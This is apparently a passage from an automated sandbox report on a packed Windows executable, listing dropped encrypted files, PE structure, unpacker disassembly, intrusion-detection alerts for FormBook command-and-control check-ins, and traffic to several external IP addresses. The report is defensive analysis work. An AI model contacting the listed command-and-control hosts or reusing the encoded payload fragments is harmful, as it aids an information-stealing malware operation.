                                            Entropy (8bit):7.573772966370223
                                            Encrypted:false
                                            SSDEEP:384:M9/REhXRzReZsxLOxg8l71kklH9+O5Wt2y6oApRk0OK:MRsEOOHzd+6Fpv
                                            MD5:0C009CF6995A0D73E229F99392E26E1A
                                            SHA1:A4A2369E55037C98CADAB1766E84B7981E26408B
                                            SHA-256:6A6A6106D10B416345D1FB47247525C1629B96058BED1AE8F0ECC794C0A04176
                                            SHA-512:B536F22E4A18DAD10D1A3E43936DE3E953CAB43D6EEAC0095CEDD3D77B321ED8D2FC00E15CB334FDC6BAFF37CA2B9D544B85E4F0AA1F61AA12AC33FF06160115
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                            C:\Users\user\AppData\Local\Temp\autA616.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):289280
                                            Entropy (8bit):7.992657614242951
                                            Encrypted:true
                                            SSDEEP:6144:4iaL+cNLr0W24h2JneX07rhAL5C7eYWGj/Yah5:4NKcN/2xeX0BAl8eYpL
                                            MD5:81933302435FB00AF2798923B03B749C
                                            SHA1:CB34FFEBDC52F4F261D5EFB71AAC076E905CCDB4
                                            SHA-256:63853DD4391E335E94A8FD82ADEB3891132B12AD1EB7194423DF31AAAF6591CE
                                            SHA-512:006DA353B710381257B71E6162DCFC20F659005C13640DA818DFAA4FB51D4B66B137D108115412B1D00DD8066A64D1BF825E918553489573139DC681CC53842E
                                            Malicious:false
                                            Reputation:low
                                            Preview:~..E4KQQ1Q00..ZC.7KQQ5Q0pS3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ.Q00],.ME.B.p.P|.rg2*6.;#>R#Q]sP;-+X?q3PqBE=.3-es..qX>TU}>WIa7KQQ5Q0IR:.~%P.l1R..P4.@...q16.K....:$.-....1W..Z9+xW,.Q5Q00S3Z..7K.P4Q.d.dZCE7KQQ5.02R8[HE7.UQ5Q00S3ZC%"KQQ%Q00#7ZCEwKQA5Q02S3\CE7KQQ5W00S3ZCE7;UQ5S00S3ZCG7..Q5A00C3ZCE'KQA5Q00S3JCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCkC.)%5Q0..7ZCU7KQ.1Q0 S3ZCE7KQQ5Q00S.ZC%7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00

                                            C:\Users\user\AppData\Local\Temp\bohmite

                                            Download File
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):289280
                                            Entropy (8bit):7.992657614242951
                                            Encrypted:true
                                            SSDEEP:6144:4iaL+cNLr0W24h2JneX07rhAL5C7eYWGj/Yah5:4NKcN/2xeX0BAl8eYpL
                                            MD5:81933302435FB00AF2798923B03B749C
                                            SHA1:CB34FFEBDC52F4F261D5EFB71AAC076E905CCDB4
                                            SHA-256:63853DD4391E335E94A8FD82ADEB3891132B12AD1EB7194423DF31AAAF6591CE
                                            SHA-512:006DA353B710381257B71E6162DCFC20F659005C13640DA818DFAA4FB51D4B66B137D108115412B1D00DD8066A64D1BF825E918553489573139DC681CC53842E
                                            Malicious:false
                                            Preview:~..E4KQQ1Q00..ZC.7KQQ5Q0pS3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ.Q00],.ME.B.p.P|.rg2*6.;#>R#Q]sP;-+X?q3PqBE=.3-es..qX>TU}>WIa7KQQ5Q0IR:.~%P.l1R..P4.@...q16.K....:$.-....1W..Z9+xW,.Q5Q00S3Z..7K.P4Q.d.dZCE7KQQ5.02R8[HE7.UQ5Q00S3ZC%"KQQ%Q00#7ZCEwKQA5Q02S3\CE7KQQ5W00S3ZCE7;UQ5S00S3ZCG7..Q5A00C3ZCE'KQA5Q00S3JCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCkC.)%5Q0..7ZCU7KQ.1Q0 S3ZCE7KQQ5Q00S.ZC%7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00

                                            C:\Users\user\AppData\Local\Temp\peristeronic

                                            Download File
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):172054
                                            Entropy (8bit):3.1806714125567406
                                            Encrypted:false
                                            SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fb:iaNlrHNILsaDfrQ7O4sCkR1avfklX
                                            MD5:AF62F55AA12474714A69B10BC3F9D6E1
                                            SHA1:D27BBF52910810866FACBF58D2B0B29EF8C19B6C
                                            SHA-256:3D3BA901EB95C09426F85968A6B86914DD8BE33904121B36F752A6E08044DC55
                                            SHA-512:832E6910DF01DBCB56530CC79A98EF8C1A3FEB02D20AAB87BA0C5B73DE6B3F96721A57CCF4A5B169F7E678376418D7D1A2EFC1BD3D196A3244E2A37BE03326B2
                                            Malicious:false
                                            Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                            Entropy (8bit):7.838072991030024
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.39%
                                            • UPX compressed Win32 Executable (30571/9) 0.30%
                                            • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            File name:qlG7x91YXH.exe
                                            File size:782'336 bytes
                                            MD5:29e38e8c57aea7a49657e5960d12f3e9
                                            SHA1:f7d3a8409c04c762baab30d5ef54becb38360c74
                                            SHA256:f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2
                                            SHA512:45a3081d46b849f6c57d36c0540c76dabc3e22441249c1bceba01259807a4a562a37ce23b32344a20a25b38146df8879cdb991af2f4af456fab292a8871dbdd0
                                            SSDEEP:12288:HsHzOUNUSB/o5LsI1uwajJ5yvv1l2C23EAmDq+F/NUYpHl1j3EaL8yiiHLwoK40u:2iUmSB/o5d1ubcvXQE/Ws0aLLpFK4yru
                                            TLSH:66F412B2B502ED4CE40757F20C7A863140678E9CD8EE890A21E93F3F7677351645BDAA
                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                            File Icon

                                            Icon Hash:0fd88dc89ea7861b

                                            Static PE Info

                                            General

                                            Entrypoint:0x547730
                                            Entrypoint Section:UPX1
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6768A2C0 [Sun Dec 22 23:37:36 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:21371b611d91188d602926b15db6bd48

                                            Entrypoint Preview

                                            Instruction
                                            pushad
                                            mov esi, 004EB000h
                                            lea edi, dword ptr [esi-000EA000h]
                                            push edi
                                            jmp 00007F37BC83C89Dh
                                            nop
                                            mov al, byte ptr [esi]
                                            inc esi
                                            mov byte ptr [edi], al
                                            inc edi
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C87Fh
                                            mov eax, 00000001h
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            add ebx, ebx
                                            jnc 00007F37BC83C89Dh
                                            jne 00007F37BC83C8BAh
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C8B1h
                                            dec eax
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            jmp 00007F37BC83C866h
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            jmp 00007F37BC83C8E4h
                                            xor ecx, ecx
                                            sub eax, 03h
                                            jc 00007F37BC83C8A3h
                                            shl eax, 08h
                                            mov al, byte ptr [esi]
                                            inc esi
                                            xor eax, FFFFFFFFh
                                            je 00007F37BC83C907h
                                            sar eax, 1
                                            mov ebp, eax
                                            jmp 00007F37BC83C89Dh
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C85Eh
                                            inc ecx
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C850h
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            add ebx, ebx
                                            jnc 00007F37BC83C881h
                                            jne 00007F37BC83C89Bh
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jnc 00007F37BC83C876h
                                            add ecx, 02h
                                            cmp ebp, FFFFFB00h
                                            adc ecx, 02h
                                            lea edx, dword ptr [edi+ebp]
                                            cmp ebp, FFFFFFFCh
                                            jbe 00007F37BC83C8A0h
                                            mov al, byte ptr [edx]

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1a9d340x424.rsrc
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1480000x61d34.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1aa1580x14.rsrc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x1479140x18UPX1
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1479340xa0UPX1
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            UPX00x10000xea0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            UPX10xeb0000x5d0000x5ca004c92a5c6a227af29ccb4f2197d035cc4False0.9886133603238867data7.9371810374314276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x1480000x630000x62200e6863ac701d89213cbcd486ef3da24e8False0.8517764729299363data7.651448217117502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x14845c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                            RT_ICON0x1485880x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                            RT_ICON0x1486b40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                            RT_ICON0x1487e00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/mEnglishGreat Britain0.14468236129184905
                                            RT_MENU0xe4ff80x50emptyEnglishGreat Britain0
                                            RT_STRING0xe50480x594emptyEnglishGreat Britain0
                                            RT_STRING0xe55dc0x68aemptyEnglishGreat Britain0
                                            RT_STRING0xe5c680x490emptyEnglishGreat Britain0
                                            RT_STRING0xe60f80x5fcemptyEnglishGreat Britain0
                                            RT_STRING0xe66f40x65cemptyEnglishGreat Britain0
                                            RT_STRING0xe6d500x466emptyEnglishGreat Britain0
                                            RT_STRING0xe71b80x158emptyEnglishGreat Britain0
                                            RT_RCDATA0x15900c0x507f2data1.0003366554043807
                                            RT_GROUP_ICON0x1a98040x14dataEnglishGreat Britain1.25
                                            RT_GROUP_ICON0x1a981c0x14dataEnglishGreat Britain1.25
                                            RT_GROUP_ICON0x1a98340x14dataEnglishGreat Britain1.15
                                            RT_GROUP_ICON0x1a984c0x14dataEnglishGreat Britain1.25
                                            RT_VERSION0x1a98640xdcdataEnglishGreat Britain0.6181818181818182
                                            RT_MANIFEST0x1a99440x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                            Imports

                                            DLLImport
                                            KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                            ADVAPI32.dllGetAce
                                            COMCTL32.dllImageList_Remove
                                            COMDLG32.dllGetSaveFileNameW
                                            GDI32.dllLineTo
                                            IPHLPAPI.DLLIcmpSendEcho
                                            MPR.dllWNetGetConnectionW
                                            ole32.dllCoGetObject
                                            OLEAUT32.dllOleLoadPicture
                                            PSAPI.DLLGetProcessMemoryInfo
                                            SHELL32.dllDragFinish
                                            USER32.dllGetDC
                                            USERENV.dllLoadUserProfileW
                                            UxTheme.dllIsThemeActive
                                            VERSION.dllVerQueryValueW
                                            WININET.dllFtpOpenFileW
                                            WINMM.dlltimeGetTime
                                            WSOCK32.dllconnect

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishGreat Britain

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2025-01-10T17:44:23.870873+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449827156.226.63.1380TCP
                                            2025-01-10T17:44:23.870873+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449827156.226.63.1380TCP
                                            2025-01-10T17:44:40.836089+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449933103.120.80.11180TCP
                                            2025-01-10T17:44:43.538626+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449951103.120.80.11180TCP
                                            2025-01-10T17:44:46.206284+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449968103.120.80.11180TCP
                                            2025-01-10T17:44:48.763580+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449985103.120.80.11180TCP
                                            2025-01-10T17:44:48.763580+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449985103.120.80.11180TCP
                                            2025-01-10T17:45:11.259241+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450009104.21.80.180TCP
                                            2025-01-10T17:45:13.879500+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450010104.21.80.180TCP
                                            2025-01-10T17:45:16.476145+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450011104.21.80.180TCP
                                            2025-01-10T17:45:18.946952+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450012104.21.80.180TCP
                                            2025-01-10T17:45:18.946952+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450012104.21.80.180TCP
                                            2025-01-10T17:45:25.172009+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450013208.91.197.2780TCP
                                            2025-01-10T17:45:27.699824+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450014208.91.197.2780TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 10, 2025 17:44:22.984572887 CET4982780192.168.2.4156.226.63.13
                                            Jan 10, 2025 17:44:22.989540100 CET8049827156.226.63.13192.168.2.4
                                            Jan 10, 2025 17:44:22.989624023 CET4982780192.168.2.4156.226.63.13
                                            Jan 10, 2025 17:44:22.998842955 CET4982780192.168.2.4156.226.63.13
                                            Jan 10, 2025 17:44:23.004277945 CET8049827156.226.63.13192.168.2.4
                                            Jan 10, 2025 17:44:23.870687962 CET8049827156.226.63.13192.168.2.4
                                            Jan 10, 2025 17:44:23.870731115 CET8049827156.226.63.13192.168.2.4
                                            Jan 10, 2025 17:44:23.870872974 CET4982780192.168.2.4156.226.63.13
                                            Jan 10, 2025 17:44:23.874108076 CET4982780192.168.2.4156.226.63.13
                                            Jan 10, 2025 17:44:23.878910065 CET8049827156.226.63.13192.168.2.4
                                            Jan 10, 2025 17:44:39.934765100 CET4993380192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:39.939901114 CET8049933103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:39.939984083 CET4993380192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:40.060647011 CET4993380192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:40.065563917 CET8049933103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:40.835550070 CET8049933103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:40.836088896 CET4993380192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:41.576072931 CET4993380192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:41.580912113 CET8049933103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:42.622591972 CET4995180192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:42.627491951 CET8049951103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:42.627600908 CET4995180192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:42.770786047 CET4995180192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:42.775769949 CET8049951103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:43.538531065 CET8049951103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:43.538625956 CET4995180192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:44.294842958 CET4995180192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:44.299798012 CET8049951103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.313215971 CET4996880192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:45.318367004 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.318474054 CET4996880192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:45.331123114 CET4996880192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:45.336098909 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336119890 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336148024 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336162090 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336232901 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336246014 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336271048 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336328030 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:45.336342096 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:46.206197977 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:46.206284046 CET4996880192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:46.841842890 CET4996880192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:46.846875906 CET8049968103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:47.859920979 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:47.864937067 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:47.865071058 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:47.872579098 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:47.877362013 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763370991 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763396025 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763413906 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763545036 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763580084 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:48.763628960 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:48.763644934 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763731003 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763757944 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763772011 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:48.763792038 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763832092 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:48.763869047 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:44:48.763911963 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:48.767796040 CET4998580192.168.2.4103.120.80.111
                                            Jan 10, 2025 17:44:48.772557974 CET8049985103.120.80.111192.168.2.4
                                            Jan 10, 2025 17:45:10.304584026 CET5000980192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:10.310501099 CET8050009104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:10.310586929 CET5000980192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:10.391254902 CET5000980192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:10.397313118 CET8050009104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:11.258136034 CET8050009104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:11.259059906 CET8050009104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:11.259165049 CET8050009104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:11.259241104 CET5000980192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:11.259241104 CET5000980192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:11.904285908 CET5000980192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:12.923059940 CET5001080192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:12.928024054 CET8050010104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:12.928152084 CET5001080192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:12.942863941 CET5001080192.168.2.4104.21.80.1
                                            Jan 10, 2025 17:45:12.947994947 CET8050010104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:13.878002882 CET8050010104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:13.879365921 CET8050010104.21.80.1192.168.2.4
                                            Jan 10, 2025 17:45:13.879499912 CET5001080192.168.2.4104.21.80.1
